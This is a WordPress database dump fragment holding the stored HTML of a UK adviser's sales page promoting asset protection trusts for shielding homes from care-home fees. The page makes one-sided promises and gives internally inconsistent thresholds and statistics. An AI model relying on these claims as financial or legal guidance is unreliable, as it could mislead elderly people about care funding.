id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;	April 2014 Stock Market Bulletin','Read about','inherit','closed','closed','','47-revision-v1','','','2017-09-21 16:47:08','2017-09-21 16:47:08','',47,'http://www.equalitywalk.org.uk/47-revision-v1',0,'revision','',0),(244,1,'2017-09-21 16:47:10','2017-09-21 16:47:10','','computer-screen','','inherit','open','closed','','computer-screen','','','2017-09-21 16:47:10','2017-09-21 16:47:10','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/computer-screen.jpg',0,'attachment','image/jpeg',0),(245,1,'2017-09-21 16:47:16','2017-09-21 16:47:16','','hands-typing','','inherit','open','closed','','hands-typing','','','2017-09-21 16:47:16','2017-09-21 16:47:16','',0,'http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/hands-typing.jpg',0,'attachment','image/jpeg',0),(246,1,'2017-09-21 16:47:17','2017-09-21 16:47:17','<body class=\"page page-id-106 page-child parent-pageid-30 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<ul class=\"social-networks social-networks-light\"><li class=\"facebook\"><a target=\"_blank\" href=\"https://en-gb.facebook.com/pages/Equity SMART/172732639431442\">Facebook</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>Facebook</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n			<li class=\"twitter\"><a target=\"_blank\" href=\"https://twitter.com/ReidScottRoss\">Twitter</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>Twitter</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n			<li class=\"linkedin\"><a target=\"_blank\" href=\"http://www.linkedin.com/company/2550529\">LinkedIn</a>&#13;\n		<div class=\"popup\">&#13;\n			<div class=\"holder\">&#13;\n				<p>LinkedIn</p>&#13;\n			</div>&#13;\n		</div>&#13;\n	</li>&#13;\n																		</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Now for a FREE 30-minute consultation<br/>on <big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"navigation\" class=\"menu\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-106 current_page_item menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674\"><a href=\"/our-blog\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678\"><a href=\"/resources\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			<li class=\"main-nav-search\">&#13;\n		<a id=\"nav-search-link\" class=\"search-link\"/>&#13;\n		<div id=\"nav-search-form\" class=\"main-nav-search-form\">&#13;\n			<form role=\"search\" id=\"searchform\" method=\"get\" action=\"/\">&#13;\n				<input type=\"text\" value=\"\" name=\"s\" id=\"s\"/><input type=\"submit\" id=\"searchsubmit\" value=\"\"/></form></div>&#13;\n	</li>&#13;\n	</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n										</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Asset Protection Trust										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/trusts\" title=\"Trusts\">Trusts</a></li><li>Asset Protection Trust</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-106\" class=\"post-106 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Asset Protection Trust</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1 style=\"text-align: center;\"><span style=\"text-decoration: underline;\">Asset Protection Trust</span></h1>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #b23f38; font-family: arial,helvetica,sans-serif; font-size: x-large;\"><b>The Critical Factors That Decide Whether Or Not You Will Have To Pay For Long Term Care</b></span></h2>&#13;\n<p style=\"text-align: justify;\"/>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large;\"> <em>What everyone needs to know about the devastating impact on their potential inheritance in order to pay for the long term needs of an elderly parent</em></span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Did you know that every year in the UK</b><b> – 1 in 6 MEN and 1 in 4 WOMAN over 65 will go into care – <span style=\"text-decoration: underline;\">Are You Going To Be One Of Them?</span></b></span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">Are you determined to STOP THE local authority taking all your assets — <b>including your house</b> — to pay for care costs? With only your last <b>£14,500</b> protected NOW IS THE TIME TO ACT to ensure you continue to have a lifetime interest in your assets.</span></p>&#13;\n<div><span style=\"font-family: arial,helvetica,sans-serif;\"><span style=\"font-size: small;\">Are Care Home fees another financial scandal affecting one of the most vulnerable groups of people and exactly where do you stand?  </span><span style=\"font-size: small;\">For many it seems like a postcode lottery or is having a bit more knowledge enough to determine who pays what?</span></span>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%; text-align: center;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><span style=\"font-size: small;\">The recently proposed changes sounded like a welcome relief to this very controversial issue but exactly how generous are they?</span></span></div>&#13;\n</div>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">Are you <b>REALLY</b> serious about taking control of the LONG TERM PRESERVATION of your estate for your children and grandchildren?</span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">After paying taxes throughout our lives, you might expect that if required long term care will be provided if ever needed in later life. Unfortunately what most people do not realise to their cost – that its means tested.</span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">After taking into account your house and assets including any savings and amount to more than £23500, then you will be expected to pay for that care yourself less any free personal care allowances.</span></p>&#13;\n<p><span style=\"color: #993300; font-family: arial,helvetica,sans-serif; font-size: medium;\"><b>Care home funding is not cheap</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">With residential care costs running at <b>£25,000 to £50,000</b> every year; it will not take long for you hard earned savings to disappear entirely.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>So what are your options:-</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>We would not recommend <b>doing nothing</b> and hope that your assets are not put at risk.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>There are stringent rules in place regarding transferring your assets to your family that could incur Capital Gains Tax. You may not wish to lose control if anything goes wrong including divorce or bankruptcy. Again, <b>we don’t recommend this.</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>If your assets are transferred safely into an asset protection trust, they will not be included as part of your wealth. You`ll avoid your estate being used to cover care costs and your beneficiaries will receive their entire legacy.</span></p>&#13;\n<p><span style=\"color: #99cc00; font-family: arial,helvetica,sans-serif; font-size: medium;\"><span style=\"color: #993300;\">What are you doing to ensure you are one residential care home winners?</span> </span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">Why not take the first step today to gain access to the knowledge and wisdom of Asset Protection Experts.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">As one of U.K.’s most respected financial planning firms we are fully invested in our clients, meaning our insights and advice that will be clear, relevant, actionable and achievable, showing you in practicable steps how you can get there from here.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">Call us today at <span class=\"rTapNumber13629\"/> for your free consultation or click the box below to have our asset protection trust expert call you at a time that suits.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">All calls are handled discretely and we value your privacy.</span></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:f8f8f8 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>FREE Adviser Consultation</h2><p>Click the button to book yours now...</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">&#13;\n<h4 class=\"content-box-gray\" style=\"text-align: center;\"><span style=\"color: #808080; font-family: arial,helvetica,sans-serif; font-size: large;\"><b>More important information how you’re Assets are considered for Long Term Care?</b></span></h4>&#13;\n</div>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">A Doctor, in conjunction with the family, will decide whether you need long term care.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">If you need nursing care, the Council must arrange for the care and they must pay for it.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</span></p>&#13;\n<h2 style=\"text-align: left;\" align=\"center\"/>&#13;\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"1\"><tbody><tr><td valign=\"top\" width=\"75\"/>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are greater than</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are between</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are below</span></p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">England</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250 – £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">Wales</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250 – £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">Scotland</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£24,750</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£15,250 – £24,750</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£15,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">N. Ireland</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250- £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250</p>&#13;\n<p align=\"center\">&#13;\n</p></td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\"/>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">You will be told you have to pay for Care. However, you may not have been told that you could be eligible for <a title=\"How to claim NHS Continuing Healthcare\" href=\"http://www.caretobedifferent.co.uk/paying-care-home-fees/nhs-continuing-healthcare/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.caretobedifferent.co.uk\']);\" target=\"_blank\">free NHS Continuing Healthcare</a></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">You will be told to pay for some of your care.</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">Your local authority will pay for your care, but will still take a proportion of your income</p>&#13;\n</td>&#13;\n</tr></tbody></table><p> </p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Apart from care costs, the Asset Protection Trust has other big advantages. </b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">It will avoid <i>Executory</i> procedure on your death and save money.</span></p>&#13;\n<ol><li><span style=\"font-family: arial,helvetica,sans-serif;\">If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif;\">On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif;\">Even if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.</span></li>&#13;\n</ol><p><span style=\"font-family: arial,helvetica,sans-serif;\">To find out more about Asset Protection Trusts and to get the advice you need, then please contact us on our free phone number <span class=\"rTapNumber13629\"> </span>to get started with your FREE complimentary review.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"> </span></p>&#13;\n<p><span style=\"color: #99cc00; font-family: arial,helvetica,sans-serif;\"><b>Asset Protection Trust FAQ:</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Why is it important? </b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>My family will take of me</b> – Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Will I get any benefit from it?</b> – Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What if I don’t go into care?</b> – Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What is the Solicitors role? – </b>Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I trust the Solicitors? </b>- Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What are the ongoing fees and costs? – </b>There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What kinds of assets can be placed in the Trust? </b>- You are not means tested by the local authority on any capital up to £14500 and is ignored – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can other assets be added at a later date? 